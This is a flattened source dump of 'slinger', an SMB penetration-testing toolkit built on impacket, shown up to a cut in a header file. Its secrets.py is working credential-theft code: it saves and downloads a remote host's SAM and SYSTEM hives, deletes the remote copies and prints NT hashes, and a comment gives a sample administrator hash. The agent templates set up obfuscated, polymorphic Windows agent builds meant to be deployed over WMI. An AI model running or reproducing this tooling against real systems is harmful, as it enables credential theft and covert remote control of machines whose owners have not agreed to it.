├── MANIFEST.in ├── src └── slingerpkg │ ├── lib │ ├── __init__.py │ ├── plugin_base.py │ ├── process_tree.py │ ├── secrets.py │ ├── error_recovery.py │ ├── named_pipe_client.py │ ├── atexec.py │ ├── agent_crypto.py │ ├── hashdump.py │ └── download_state.py │ ├── utils │ ├── __init__.py │ ├── logger.py │ ├── printlib.py │ └── common.py │ ├── var │ ├── __init__.py │ └── config.py │ ├── automation │ ├── __init__.py │ ├── vars.py │ └── utils.py │ ├── __init__.py │ ├── tools │ ├── upx_32.exe │ └── upx_64.exe │ └── plugins │ └── system_audit.py ├── mypy.ini ├── .coverage ├── docs ├── assets │ ├── clidocs.jpg │ ├── image.png │ └── slinger-agent.gif ├── agent_demo.md ├── TODO.md └── TECHNICAL_SPEC.md ├── .flake8 ├── requirements.txt ├── .gitignore ├── .pre-commit-config.yaml ├── pyproject.toml ├── lib └── agent_templates │ ├── build_config.cmake │ ├── obfuscation.h │ ├── dh_x25519.h │ ├── command_executor.h │ └── auth_protocol.h ├── CLAUDE.md ├── .github └── workflows │ └── cli-flag-standards.yml ├── scripts ├── generate_test_stub.py ├── check_cli_flags.py ├── install_agent_deps.py └── build_script.py └── LICENSE /MANIFEST.in: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /src/slingerpkg/lib/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /src/slingerpkg/utils/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /src/slingerpkg/var/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /src/slingerpkg/automation/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /mypy.ini: -------------------------------------------------------------------------------- 1 | [mypy] 2 | ignore_errors = True 3 | -------------------------------------------------------------------------------- /.coverage: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ghost-ng/slinger/HEAD/.coverage -------------------------------------------------------------------------------- /src/slingerpkg/__init__.py: -------------------------------------------------------------------------------- 1 | __version__ = "1.10.1" 2 | __package__ = "slinger" 3 | -------------------------------------------------------------------------------- /docs/assets/clidocs.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ghost-ng/slinger/HEAD/docs/assets/clidocs.jpg -------------------------------------------------------------------------------- /docs/assets/image.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ghost-ng/slinger/HEAD/docs/assets/image.png -------------------------------------------------------------------------------- /docs/assets/slinger-agent.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ghost-ng/slinger/HEAD/docs/assets/slinger-agent.gif -------------------------------------------------------------------------------- /src/slingerpkg/tools/upx_32.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ghost-ng/slinger/HEAD/src/slingerpkg/tools/upx_32.exe -------------------------------------------------------------------------------- /src/slingerpkg/tools/upx_64.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ghost-ng/slinger/HEAD/src/slingerpkg/tools/upx_64.exe -------------------------------------------------------------------------------- /.flake8: -------------------------------------------------------------------------------- 1 | [flake8] 2 | max-line-length = 100 3 | ignore = F403,F405,F841,F541,E722,E501 4 | exclude = .git,__pycache__,docs/source/conf.py,old,build,dist 5 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | impacket==0.11.0 2 | prompt_toolkit==3.0.41 3 | pycryptodome==3.20.0 4 | setuptools==70.0.0 5 | tabulate==0.8.9 6 | toml 7 | passlib 8 | python-dotenv>=1.0.0 9 | openai>=1.0.0 10 | pexpect>=4.8.0 11 | PyYAML>=6.0 12 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | *pycache* 2 | *__pycache__* 3 | tests/integration/htb_find_tests/ 4 | tests/integration/htb_config.py 5 | tests/integration/run_htb_tests.py 6 | tests/integration/README_HTB.md 7 | test_*.py 8 | debug_*.py 9 | dist 10 | build 11 | *egg-info* 12 | .venv 13 | .env 14 | venv/ 15 | ai_test_framework/* 16 | ai_test_framework/test_reports 17 | .pytest_cache 18 | .mypy_cache 19 | -------------------------------------------------------------------------------- /src/slingerpkg/automation/vars.py: -------------------------------------------------------------------------------- 1 | import re 2 | from unittest.mock import MagicMock 3 | 4 | from slingerpkg.utils.cli import extract_commands_and_args, setup_cli_parser 5 | 6 | ANSI = r"\x1b\[[0-9;]*[A-Za-z]" 7 | PROMPT = re.compile(rf"(?:{ANSI})*\[sl\].*?> ") 8 | 9 | mock_client = MagicMock() 10 | parser = setup_cli_parser(mock_client) 11 | COMMAND_LIST = ", ".join(extract_commands_and_args(parser).keys()) 12 | -------------------------------------------------------------------------------- /docs/agent_demo.md: -------------------------------------------------------------------------------- 1 | # Slinger Cooperative Agent Demo 2 | 3 | This video demonstrates the Slinger cooperative agent system in action, showing agent deployment, execution, and management. 4 | 5 | ![Slinger Agent Demo](assets/slinger-agent.gif) 6 | 7 | ## What You'll See 8 | 9 | - Building polymorphic C++ agents with encryption 10 | - Deploying agents via WMI over SMB 11 | - Establishing encrypted named pipe connections 12 | - Executing commands through the agent 13 | - Agent lifecycle management (check, kill, remove) 14 | 15 | ## Getting Started 16 | 17 | See the [main README](README.md#cooperative-agent-system) for installation and usage instructions. 18 | -------------------------------------------------------------------------------- /src/slingerpkg/automation/utils.py: -------------------------------------------------------------------------------- 1 | import argparse 2 | 3 | 4 | def extract_commands_and_args(parser: argparse.ArgumentParser) -> dict: 5 | """ 6 | Walk an argparse parser built by slingerpkg.utils.cli.setup_cli_parser(...) 7 | and return a dict of {command_name: {...}} for every sub‐command. 8 | """ 9 | commands: dict = {} 10 | for action in parser._actions: 11 | if isinstance(action, argparse._SubParsersAction): 12 | for cmd, subp in action.choices.items(): 13 | desc = getattr(subp, "description", "") 14 | commands[cmd] = {"description": desc, "arguments": []} 15 | for sa in subp._actions: 16 | if isinstance(sa, argparse._StoreAction): 17 | commands[cmd]["arguments"].append( 18 | { 19 | "name": sa.dest, 20 | "help": sa.help, 21 | "choices": sa.choices, 22 | "default": sa.default, 23 | "required": getattr(sa, "required", False), 24 | } 25 | ) 26 | return commands 27 | -------------------------------------------------------------------------------- /src/slingerpkg/lib/plugin_base.py: -------------------------------------------------------------------------------- 1 | # plugin_base.py 2 | import argparse 3 | import importlib 4 | import os 5 | 6 | 7 | def load_plugins(plugin_dirs, client): 8 | plugins = [] 9 | for plugin_dir in plugin_dirs: 10 | for filename in os.listdir(plugin_dir): 11 | if filename.endswith(".py"): 12 | spec = importlib.util.spec_from_file_location( 13 | "module.name", os.path.join(plugin_dir, filename) 14 | ) 15 | module = importlib.util.module_from_spec(spec) 16 | spec.loader.exec_module(module) 17 | for obj in vars(module).values(): 18 | if ( 19 | isinstance(obj, type) 20 | and issubclass(obj, PluginBase) 21 | and obj is not PluginBase 22 | ): 23 | plugins.append(obj(client)) 24 | return plugins 25 | 26 | 27 | class PluginBase: 28 | def __init__(self, client, *args, **kwargs): 29 | super().__init__(*args, **kwargs) 30 | self.client = client 31 | 32 | def get_parser(self): 33 | parser = argparse.ArgumentParser(add_help=False) 34 | return parser 35 | 36 | def run(self, args): 37 | raise NotImplementedError 38 | -------------------------------------------------------------------------------- /.pre-commit-config.yaml: -------------------------------------------------------------------------------- 1 | repos: 2 | - repo: https://github.com/pre-commit/pre-commit-hooks 3 | rev: v4.6.0 4 | hooks: 5 | - id: trailing-whitespace 6 | - id: end-of-file-fixer 7 | - id: check-yaml 8 | - id: check-added-large-files 9 | - id: check-json 10 | - id: check-toml 11 | - id: check-merge-conflict 12 | - id: debug-statements 13 | - id: mixed-line-ending 14 | 15 | - repo: https://github.com/psf/black 16 | rev: 24.10.0 17 | hooks: 18 | - id: black 19 | language_version: python3 20 | args: [--line-length=100] 21 | 22 | - repo: https://github.com/PyCQA/flake8 23 | rev: 7.1.1 24 | hooks: 25 | - id: flake8 26 | args: [--max-line-length=100, --extend-ignore=E203] 27 | exclude: ^(research/|src/debug_scripts/|build_script\.py|src/run_agents\.py) 28 | 29 | - repo: https://github.com/pre-commit/mirrors-mypy 30 | rev: v1.13.0 31 | hooks: 32 | - id: mypy 33 | additional_dependencies: [ 34 | types-setuptools, 35 | types-toml, 36 | types-requests, 37 | types-tabulate 38 | ] 39 | args: [ 40 | --ignore-missing-imports, 41 | --no-strict-optional, 42 | --disable-error-code=name-defined, 43 | --disable-error-code=attr-defined, 44 | --disable-error-code=var-annotated, 45 | --disable-error-code=no-redef 46 | ] 47 | exclude: ^(research/|src/debug_scripts/) 48 | 49 | # Disabled temporarily - causes CI failures due to missing tests 50 | # - repo: local 51 | # hooks: 52 | # - id: test-coverage-check 53 | # name: Check test coverage for new commands 54 | # entry: python tests/test_coverage_validator.py 55 | # language: system 56 | # pass_filenames: false 57 | # files: ^src/slingerpkg/utils/cli\.py$ 58 | -------------------------------------------------------------------------------- /src/slingerpkg/utils/logger.py: -------------------------------------------------------------------------------- 1 | import logging 2 | from logging.handlers import TimedRotatingFileHandler 3 | import os 4 | from datetime import datetime 5 | from traceback import format_exception 6 | 7 | 8 | class SlingerLogger: 9 | """ 10 | A logger class that sets up a daily rotating file logger. 11 | Attributes: 12 | logger (logging.Logger): The logger instance. 13 | Methods: 14 | __init__(log_folder, log_file_basename): 15 | Initializes the SlingerLogger with the specified log folder and log file base name. 16 | get_logger(): 17 | Returns the logger instance. 18 | """ 19 | 20 | def __init__(self, log_folder, log_file_basename): 21 | # Ensure the log folder exists 22 | os.makedirs(log_folder, exist_ok=True) 23 | 24 | # Full path for the log file with the base name 25 | log_file_path = os.path.join(log_folder, log_file_basename) 26 | 27 | # Set up the logger 28 | self.logger = logging.getLogger("DailyFileLogger") 29 | self.logger.setLevel(logging.DEBUG) 30 | 31 | # Create a handler for writing logs to a file with daily rotation 32 | handler = TimedRotatingFileHandler( 33 | log_file_path, when="midnight", interval=1, backupCount=7 34 | ) 35 | handler.suffix = "%Y-%m-%d.log" # Suffix for the log file 36 | handler.setFormatter(logging.Formatter("%(asctime)s - %(levelname)s - %(message)s")) 37 | 38 | self.logger.addHandler(handler) 39 | 40 | def get_logger(self): 41 | return self.logger 42 | 43 | 44 | def error_logging(e): 45 | # e is sys.exc_info() 46 | exc_type, exc_value, exc_traceback = e 47 | tb_lines = format_exception(exc_type, exc_value, exc_traceback) 48 | error_message = "".join(tb_lines) 49 | if "NoneType" in error_message: 50 | error_message = "" 51 | return error_message 52 | -------------------------------------------------------------------------------- /pyproject.toml: -------------------------------------------------------------------------------- 1 | [build-system] 2 | requires = [ "setuptools", "wheel",] 3 | build-backend = "setuptools.build_meta" 4 | 5 | [project] 6 | name = "slinger" 7 | version = "1.10.1" 8 | description = "An impacket swiss army knife (sort of)" 9 | readme = "README.md" 10 | keywords = [ "smb", "impacket", "penetration-testing", "windows", "agent", "cooperative",] 11 | classifiers = [ "Development Status :: 4 - Beta", "Environment :: Console", "Intended Audience :: Information Technology", "License :: OSI Approved :: MIT License", "Operating System :: POSIX :: Linux", "Operating System :: Microsoft :: Windows", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Programming Language :: Python :: 3.12", "Topic :: Security", "Topic :: System :: Systems Administration",] 12 | dependencies = [ "impacket==0.11.0", "prompt_toolkit==3.0.41", "pycryptodome==3.20.0", "setuptools==70.0.0", "tabulate==0.8.9", "toml", "passlib", "python-dotenv>=1.0.0", "openai>=1.0.0", "pexpect>=4.8.0", "PyYAML>=6.0",] 13 | requires-python = ">=3.10" 14 | [[project.authors]] 15 | name = "ghost-ng" 16 | email = "ghost-ng@outlook.com" 17 | 18 | [project.optional-dependencies] 19 | dev = [ "pytest>=7.4.0", "pytest-cov>=4.1.0", "pytest-mock>=3.11.1", "pytest-asyncio>=0.21.1", "pytest-timeout>=2.1.0", "black>=23.7.0", "flake8>=6.1.0", "mypy>=1.4.1", "pre-commit>=3.3.3",] 20 | 21 | [project.license] 22 | file = "LICENSE" 23 | 24 | [project.scripts] 25 | slinger = "slingerpkg.slinger:main" 26 | slinger-setup-agent = "slingerpkg.scripts.install_agent_deps:main" 27 | 28 | [project.urls] 29 | Homepage = "https://github.com/ghost-ng/slinger" 30 | Repository = "https://github.com/ghost-ng/slinger" 31 | Documentation = "https://github.com/ghost-ng/slinger#readme" 32 | "Bug Tracker" = "https://github.com/ghost-ng/slinger/issues" 33 | 34 | [tool.setuptools.package-data] 35 | slingerpkg = [ "plugins/*",] 36 | 37 | [tool.setuptools.packages.find] 38 | where = [ "src",] 39 | -------------------------------------------------------------------------------- /src/slingerpkg/var/config.py: -------------------------------------------------------------------------------- 1 | from pathlib import Path 2 | from slingerpkg import __version__, __package__ 3 | 4 | 5 | def get_main_package_dir(): 6 | current_dir = Path(__file__).resolve().parent 7 | while current_dir != current_dir.root: 8 | # Check if it contains a top-level __init__.py (indicating it's a package) 9 | init_file = (Path(__file__).parent.parent / "__init__.py").resolve() 10 | if init_file.exists(): 11 | return current_dir / "src" / "slingerpkg" 12 | current_dir = current_dir.parent 13 | 14 | raise FileNotFoundError("Main package directory not found.") 15 | 16 | 17 | plugin_dir = get_main_package_dir() / "plugins" 18 | 19 | config_vars = [ 20 | {"Name": "Debug", "Value": False, "Description": "Enable debug messages", "Type": "bool"}, 21 | { 22 | "Name": "Logs_Folder", 23 | "Value": "~/.slinger/logs", 24 | "Description": "Folder to store history files", 25 | "Type": "str", 26 | }, 27 | { 28 | "Name": "History_File", 29 | "Value": "~/.slinger/history", 30 | "Description": "History file location", 31 | "Type": "str", 32 | }, 33 | { 34 | "Name": "Codec", 35 | "Value": "utf-8", 36 | "Description": "Codec to use for print decoding", 37 | "Type": "str", 38 | }, 39 | { 40 | "Name": "Plugin_Folders", 41 | "Value": ["~/.slinger/plugins", plugin_dir], 42 | "Description": "Folder to store plugins", 43 | "Type": "str", 44 | }, 45 | { 46 | "Name": "Verbose", 47 | "Value": False, 48 | "Description": "Enable verbose output for operations", 49 | "Type": "bool", 50 | }, 51 | { 52 | "Name": "Extra_Prompt", 53 | "Value": "", 54 | "Description": "Extra prompt to display in CLI", 55 | "Type": "str", 56 | }, 57 | { 58 | "Name": "Timeout", 59 | "Value": 86400, 60 | "Description": "Global SMB connection timeout in seconds (default: 24 hours)", 61 | "Type": "int", 62 | }, 63 | ] 64 | 65 | logwriter = None 66 | version = __version__ 67 | program_name = __package__ 68 | -------------------------------------------------------------------------------- /src/slingerpkg/plugins/system_audit.py: -------------------------------------------------------------------------------- 1 | # my_plugin.py 2 | from slingerpkg.lib.plugin_base import PluginBase # required 3 | import argparse # required 4 | from slingerpkg.utils.printlib import * # required, use pre-defined print functions 5 | 6 | from slingerpkg.utils.common import tee_output # optional but cool 7 | 8 | plugin_name = "System Audit" 9 | author_name = "ghost-ng" 10 | author_meta = "https://github.com/ghost-ng/" 11 | credits = "iamSiddhartha" 12 | version = "1.0" 13 | 14 | 15 | class MyPlugin(PluginBase): 16 | # Name 17 | name = plugin_name # required 18 | author_block = { 19 | "name": author_name, 20 | "meta": author_meta, 21 | "credits": credits, 22 | "version": version, 23 | } # required 24 | 25 | def get_parser(self): # required 26 | # define a new subparser to return to merge with the main parser 27 | parser = argparse.ArgumentParser(add_help=False) # required 28 | subparsers = parser.add_subparsers(dest="command") # required 29 | plugincmd_parser = subparsers.add_parser( 30 | "audit", help="Runs through typical system audit functions" 31 | ) # required 32 | plugincmd_parser.add_argument("-s", "--save", help="Save to file") 33 | plugincmd_parser.set_defaults(func=self.run) # required entry point 34 | return parser 35 | 36 | def run(self, args): # required 37 | print_block(f"Running System Audit") 38 | 39 | # Dictionary mapping audit actions to their corresponding method calls 40 | audit_dict = { 41 | "System Info": self.client.enum_info, 42 | "Other Info": self.client.info, 43 | "IP Config": self.client.ipconfig, 44 | "Hostname": self.client.hostname, 45 | "Environment Variables": self.client.show_env, 46 | "System Logons": self.client.enum_logons, 47 | "Server Disk Info": self.client.enum_server_disk, 48 | "Sessions": self.client.who, 49 | "Net Shares": self.client.list_shares, 50 | "Enum Services": self.client.enum_services, 51 | "Enum Processes": self.client.show_process_list, 52 | } 53 | 54 | with tee_output(args.save): 55 | # Iterate through the dictionary and execute each function 56 | for key, func in audit_dict.items(): 57 | print_log() 58 | print_block(f"{key}", color=colors.BLUE) 59 | try: 60 | result = func() 61 | if result: 62 | print_log(f"{key} Result: {result}") 63 | except Exception as e: 64 | print_log(f"Error while executing {key}: {str(e)}") 65 | 66 | print_block(f"System Audit Complete", color=colors.YELLOW) 67 | -------------------------------------------------------------------------------- /lib/agent_templates/build_config.cmake: -------------------------------------------------------------------------------- 1 | # CMake configuration for polymorphic agent builds 2 | cmake_minimum_required(VERSION 3.15) 3 | project(SlingerAgent) 4 | 5 | set(CMAKE_CXX_STANDARD 17) 6 | set(CMAKE_CXX_STANDARD_REQUIRED ON) 7 | 8 | # Platform detection 9 | if(CMAKE_SIZEOF_VOID_P EQUAL 8) 10 | set(ARCH_BITS 64) 11 | set(ARCH_SUFFIX "x64") 12 | else() 13 | set(ARCH_BITS 32) 14 | set(ARCH_SUFFIX "x86") 15 | endif() 16 | 17 | # Compiler-specific optimizations and obfuscation 18 | if(MSVC) 19 | # MSVC specific flags for obfuscation 20 | set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} /O2 /Ob2 /GL /LTCG") 21 | set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} /GS- /Gy /Gw") 22 | # Remove debug information 23 | set(CMAKE_CXX_FLAGS_RELEASE "${CMAKE_CXX_FLAGS_RELEASE} /DNDEBUG") 24 | # Link time optimization 25 | set(CMAKE_EXE_LINKER_FLAGS "${CMAKE_EXE_LINKER_FLAGS} /LTCG /OPT:REF /OPT:ICF") 26 | elseif(GNU) 27 | # GCC/MinGW specific flags 28 | set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -O3 -ffunction-sections -fdata-sections") 29 | set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -fno-stack-protector -fno-exceptions") 30 | set(CMAKE_EXE_LINKER_FLAGS "${CMAKE_EXE_LINKER_FLAGS} -Wl,--gc-sections -s") 31 | endif() 32 | 33 | # Source files 34 | set(AGENT_SOURCES 35 | agent_main.cpp 36 | obfuscation.h 37 | pipe_core.h 38 | command_executor.h 39 | ) 40 | 41 | # Create executable with obfuscated name 42 | set(EXECUTABLE_NAME "slinger_agent_${ARCH_SUFFIX}") 43 | 44 | # Add polymorphic build options 45 | option(ENABLE_ENCRYPTION "Enable polymorphic encryption" ON) 46 | option(RANDOMIZE_LAYOUT "Randomize code layout" ON) 47 | option(OBFUSCATE_STRINGS "Obfuscate string literals" ON) 48 | 49 | if(ENABLE_ENCRYPTION) 50 | add_definitions(-DENABLE_POLYMORPHIC_ENCRYPTION) 51 | endif() 52 | 53 | if(RANDOMIZE_LAYOUT) 54 | add_definitions(-DRANDOMIZE_CODE_LAYOUT) 55 | endif() 56 | 57 | if(OBFUSCATE_STRINGS) 58 | add_definitions(-DOBFUSCATE_ALL_STRINGS) 59 | endif() 60 | 61 | # Generate unique build ID for polymorphic encryption 62 | string(TIMESTAMP BUILD_ID "%Y%m%d%H%M%S") 63 | math(EXPR RANDOM_SEED "${BUILD_ID} % 65536") 64 | add_definitions(-DBUILD_SEED=${RANDOM_SEED}) 65 | 66 | # Create the agent executable 67 | add_executable(${EXECUTABLE_NAME} ${AGENT_SOURCES}) 68 | 69 | # Link required Windows libraries 70 | if(WIN32) 71 | target_link_libraries(${EXECUTABLE_NAME} PRIVATE 72 | kernel32 73 | user32 74 | advapi32 75 | shell32 76 | ) 77 | endif() 78 | 79 | # Set output directory 80 | set_target_properties(${EXECUTABLE_NAME} PROPERTIES 81 | RUNTIME_OUTPUT_DIRECTORY "${CMAKE_BINARY_DIR}/bin" 82 | OUTPUT_NAME "agent_${RANDOM_SEED}_${ARCH_SUFFIX}" 83 | ) 84 | 85 | # Custom commands for polymorphic builds 86 | add_custom_command(TARGET ${EXECUTABLE_NAME} POST_BUILD 87 | COMMAND ${CMAKE_COMMAND} -E echo "Built polymorphic agent: ${EXECUTABLE_NAME}" 88 | COMMAND ${CMAKE_COMMAND} -E echo "Architecture: ${ARCH_BITS}-bit" 89 | COMMAND ${CMAKE_COMMAND} -E echo "Build seed: ${RANDOM_SEED}" 90 | ) 91 | 92 | # Install target 93 | install(TARGETS ${EXECUTABLE_NAME} 94 | RUNTIME DESTINATION bin 95 | ) 96 | -------------------------------------------------------------------------------- /src/slingerpkg/lib/process_tree.py: -------------------------------------------------------------------------------- 1 | from collections import defaultdict 2 | 3 | 4 | def print_process_tree(processes, verbose=False): 5 | """ 6 | Given a dictionary of processes keyed by PID (each with 'Name', 'PID', 'PPID', etc.), 7 | print an ASCII tree where processes are nested under their parent (by PPID). 8 | 9 | If a process is orphaned (its PPID chain does not lead to a valid root), 10 | it will be attached to the root level along with the main tree. 11 | """ 12 | 13 | # Build mapping: PPID -> list of child processes. 14 | children = defaultdict(list) 15 | for proc in processes.values(): 16 | children[proc["PPID"]].append(proc) 17 | for ppid in children: 18 | children[ppid].sort(key=lambda x: x["PID"]) 19 | 20 | # Recursive function to print a branch from a given PID. 21 | def print_branch(pid, prefix="", visited=None): 22 | if visited is None: 23 | visited = set() 24 | if pid in visited: 25 | # print(prefix + "* [Cycle detected] (PID: {})".format(pid)) 26 | return 27 | visited.add(pid) 28 | for i, proc in enumerate(children.get(pid, [])): 29 | if i == len(children[pid]) - 1: 30 | connector = "└── " 31 | new_prefix = prefix + " " 32 | else: 33 | connector = "├── " 34 | new_prefix = prefix + "│ " 35 | if verbose: 36 | print( 37 | prefix 38 | + connector 39 | + f'{proc["Name"]} (PID: {proc["PID"]} | PPID: {proc["PPID"]} | Handles: {proc["Handles"]} | Threads: {proc["Threads"]})' 40 | ) 41 | else: 42 | print( 43 | prefix 44 | + connector 45 | + f'{proc["Name"]} (PID: {proc["PID"]} | PPID: {proc["PPID"]})' 46 | ) 47 | if proc["PID"] != proc["PPID"]: 48 | print_branch(proc["PID"], new_prefix, visited.copy()) 49 | 50 | # Determine reachable processes: those connected (via PPID chain) to a valid root (PPID 0). 51 | reachable = set() 52 | 53 | def mark_reachable(pid, visited=None): 54 | if visited is None: 55 | visited = set() 56 | if pid in visited: 57 | return 58 | visited.add(pid) 59 | reachable.add(pid) 60 | for proc in children.get(pid, []): 61 | if proc["PID"] != proc["PPID"]: 62 | mark_reachable(proc["PID"], visited.copy()) 63 | 64 | mark_reachable(0) 65 | 66 | # Collect orphan roots: processes not reachable from 0. 67 | orphan_roots = [ 68 | proc 69 | for proc in processes.values() 70 | if proc["PID"] not in reachable 71 | and (proc["PPID"] in reachable or proc["PPID"] not in processes) 72 | ] 73 | 74 | # Print main tree starting from PPID 0. 75 | 76 | if 0 in children: 77 | print_branch(0, "") 78 | else: 79 | print("No root processes with PPID 0 found.") 80 | 81 | # Instead of a separate orphan section, attach orphan roots at the root level. 82 | if orphan_roots: 83 | # print("\nAdditional Orphan Branches attached to root:") 84 | printed_orphans = set() 85 | for proc in sorted(orphan_roots, key=lambda x: x["PID"]): 86 | if proc["PID"] in printed_orphans: 87 | continue 88 | if verbose: 89 | print( 90 | f'----{proc["Name"]} (PID: {proc["PID"]} | PPID: {proc["PPID"]} | Handles: {proc["Handles"]} | Threads: {proc["Threads"]})' 91 | ) 92 | else: 93 | print(f'----{proc["Name"]} (PID: {proc["PID"]} | PPID: {proc["PPID"]})') 94 | print_branch(proc["PID"], " ") 95 | 96 | def mark_printed(pid): 97 | printed_orphans.add(pid) 98 | for child in children.get(pid, []): 99 | if child["PID"] != child["PPID"]: 100 | mark_printed(child["PID"]) 101 | 102 | mark_printed(proc["PID"]) 103 | -------------------------------------------------------------------------------- /src/slingerpkg/lib/secrets.py: -------------------------------------------------------------------------------- 1 | from binascii import hexlify, unhexlify 2 | from shutil import which 3 | from slingerpkg.utils.printlib import * 4 | from slingerpkg.lib.hashdump import * 5 | from slingerpkg.utils.common import run_local_command 6 | 7 | 8 | class secrets: 9 | def __init__(self): 10 | print_debug("WinReg Module Loaded!") 11 | self._bootKey = b"" 12 | self._samKey = b"" 13 | 14 | def getBootKey(self): 15 | self._bootKey = b"" 16 | print_debug("Getting BootKey") 17 | bootKey = b"" 18 | self.setup_dce_transport() 19 | self.dce_transport._connect("winreg") 20 | bootKey = self.dce_transport._get_boot_key() 21 | transforms = [8, 5, 4, 2, 11, 9, 13, 3, 0, 6, 1, 12, 14, 10, 15, 7] 22 | 23 | bootKey = unhexlify(bootKey) 24 | 25 | for i in range(len(bootKey)): 26 | self._bootKey += bootKey[transforms[i] : transforms[i] + 1] 27 | 28 | print_good("Target system bootKey: 0x%s" % hexlify(self._bootKey).decode("utf-8")) 29 | 30 | def saveHive(self, hiveName): 31 | print_debug(f"Saving Hive {hiveName}") 32 | self.setup_dce_transport() 33 | self.dce_transport._connect("winreg") 34 | remoteFileName = self.dce_transport._save_hive(hiveName) 35 | if remoteFileName is None: 36 | print_bad(f"Failed to save {hiveName} hive") 37 | return None, None 38 | saveName = "/tmp/" + hiveName + ".hive" 39 | if self.share.upper() == "C$": 40 | remotePath = f"\\Windows\\Temp\\{remoteFileName}" 41 | self.download(remotePath, saveName) 42 | elif self.share.upper() == "ADMIN$": 43 | remotePath = f"\\Temp\\{remoteFileName}" 44 | self.download(remotePath, saveName) 45 | 46 | return remotePath, saveName 47 | 48 | def secretsdump(self, args): 49 | try: 50 | if self.share.upper() != "C$" and self.share.upper() != "ADMIN$": 51 | print_warning("You need to connect to C$ or ADMIN$ to dump hashes") 52 | return 53 | except AttributeError: 54 | print_warning("You need to connect to C$ or ADMIN$ to dump hashes") 55 | return 56 | print_info("Dumping secrets...") 57 | remotePath_SYSTEM, localPath_SYSTEM = self.saveHive("SYSTEM") 58 | self.delete(remotePath_SYSTEM) 59 | print_info("Saving SAM Hive") 60 | remotePath_SAM, localPath_SAM = self.saveHive("SAM") 61 | self.delete(remotePath_SAM) 62 | # determine which command is avilable 63 | bins = ["secretsdump.py", "secretsdump", "impacket-secretsdump", "impacket-secretsdump.py"] 64 | binaryName = None 65 | for bin in bins: 66 | if which(bin): 67 | binaryName = which(bin) 68 | if binaryName is None: 69 | binaryName = "secretsdump.py" # local copy 70 | print_info(f"Using {os.path.basename(binaryName)} to dump secrets") 71 | run_local_command(f"{binaryName} -sam {localPath_SAM} -system {localPath_SYSTEM} LOCAL") 72 | 73 | def hashdump(self, args): 74 | hashTable = [] 75 | share = self.share 76 | try: 77 | if share.upper() != "C$" and share.upper() != "ADMIN$": 78 | print_warning("You need to connect to C$ or ADMIN$ to dump hashes") 79 | return 80 | except AttributeError: 81 | print_warning("You need to connect to C$ or ADMIN$ to dump hashes") 82 | return 83 | 84 | print_info("Dumping hashes...") 85 | # self.getBootKey() 86 | print_info("Saving SYSTEM Hive") 87 | remotePath_SYSTEM, localPath_SYSTEM = self.saveHive("SYSTEM") 88 | self.delete(remotePath_SYSTEM) 89 | print_info("Saving SAM Hive") 90 | remotePath_SAM, localPath_SAM = self.saveHive("SAM") 91 | self.delete(remotePath_SAM) 92 | sys_key = get_bootkey(localPath_SYSTEM) 93 | print(f"BootKey: {sys_key.hex()}") 94 | # Initialize registry access function 95 | h = RegHive(localPath_SAM) 96 | sam_key = get_hbootkey(h, sys_key) 97 | print(f"SamKey: {sam_key.hex()}") 98 | 99 | # list users and hashes 100 | hashTable = get_hashes(h, sam_key) 101 | # print(hashTable) 102 | # Administrator:500:aad3b435b51404eeaad3b435b51404ee:5e119ec7919cc3b1d7ad859697cfa659::: 103 | for user in hashTable: 104 | print(f"{user['Username']}:{user['RID']}:{user['LMHash']}:{user['NTHash']}:::") 105 | -------------------------------------------------------------------------------- /lib/agent_templates/obfuscation.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Cross-platform compatibility layer 4 | #ifdef _WIN32 5 | #include 6 | #else 7 | #include 8 | #include 9 | #include 10 | #endif 11 | 12 | #include 13 | #include 14 | #include 15 | 16 | namespace obfuscated { 17 | 18 | // Compile-time random seed generation 19 | constexpr uint32_t compile_seed() { 20 | #ifdef BUILD_SEED 21 | return BUILD_SEED; 22 | #else 23 | #error "BUILD_SEED must be defined at compile time via CMake -DBUILD_SEED=" 24 | #endif 25 | } 26 | 27 | // Runtime random seed for additional entropy 28 | inline uint32_t random_seed() { 29 | static uint32_t seed = static_cast( 30 | std::chrono::high_resolution_clock::now().time_since_epoch().count() 31 | ) ^ compile_seed(); 32 | seed = seed * 1103515245 + 12345; 33 | return seed; 34 | } 35 | 36 | // Derive encryption key from index and base seed 37 | constexpr uint8_t derive_key(size_t index) { 38 | return static_cast((compile_seed() * 0x9E3779B9 + index) & 0xFF); 39 | } 40 | 41 | // Compile-time string obfuscation 42 | template 43 | struct ObfuscatedString { 44 | char data[N]; 45 | 46 | constexpr ObfuscatedString(const char (&str)[N]) : data{} { 47 | for (size_t i = 0; i < N - 1; ++i) { 48 | data[i] = str[i] ^ derive_key(i + KEY); 49 | } 50 | data[N - 1] = '\0'; 51 | } 52 | 53 | std::string decrypt() const { 54 | std::string result; 55 | result.reserve(N - 1); 56 | for (size_t i = 0; i < N - 1; ++i) { 57 | result += static_cast(data[i] ^ derive_key(i + KEY)); 58 | } 59 | return result; 60 | } 61 | }; 62 | 63 | // Function name obfuscation macro 64 | #define OBF_FUNC_NAME(name) obf_##name##_##BUILD_SEED 65 | 66 | // String obfuscation macro 67 | #define OBF_STRING(str) (obfuscated::ObfuscatedString(str)) 68 | 69 | // Control flow obfuscation helpers 70 | template 71 | inline T obfuscate_value(T value) { 72 | volatile uint32_t noise = random_seed(); 73 | return value ^ (noise & 0) ^ (noise & 0); 74 | } 75 | 76 | // Dead code insertion for 